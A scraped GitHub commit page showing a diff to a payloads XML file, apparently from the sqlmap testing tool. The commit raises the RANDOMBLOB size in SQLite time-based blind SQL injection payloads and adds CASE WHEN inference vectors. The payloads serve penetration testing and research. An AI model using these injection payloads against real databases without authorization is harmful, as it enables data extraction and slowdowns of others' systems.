Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit d0936bc

Browse files
committed
adding vectors for SQLite time-based payloads
1 parent 54b8cb7 commit d0936bc

1 file changed

Lines changed: 5 additions & 3 deletions

File tree

xml/payloads.xml

Lines changed: 5 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1383,7 +1383,7 @@ Formats:
13831383
<clause>0</clause>
13841384
<where>1</where>
13851385
<request>
1386-
<payload>; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))));</payload>
1386+
<payload>; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000))));</payload>
13871387
<comment>--</comment>
13881388
</request>
13891389
<response>
@@ -1541,8 +1541,9 @@ Formats:
15411541
<risk>1</risk>
15421542
<clause>1</clause>
15431543
<where>1</where>
1544+
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000))))) ELSE [RANDNUM] END)</vector>
15441545
<request>
1545-
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
1546+
<payload>AND [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000))))</payload>
15461547
</request>
15471548
<response>
15481549
<time>[DELAYED]</time>
@@ -1699,8 +1700,9 @@ Formats:
16991700
<risk>3</risk>
17001701
<clause>1</clause>
17011702
<where>1</where>
1703+
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000))))) ELSE [RANDNUM] END)</vector>
17021704
<request>
1703-
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
1705+
<payload>OR [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000))))</payload>
17041706
</request>
17051707
<response>
17061708
<time>[DELAYED]</time>

0 commit comments

Comments
 (0)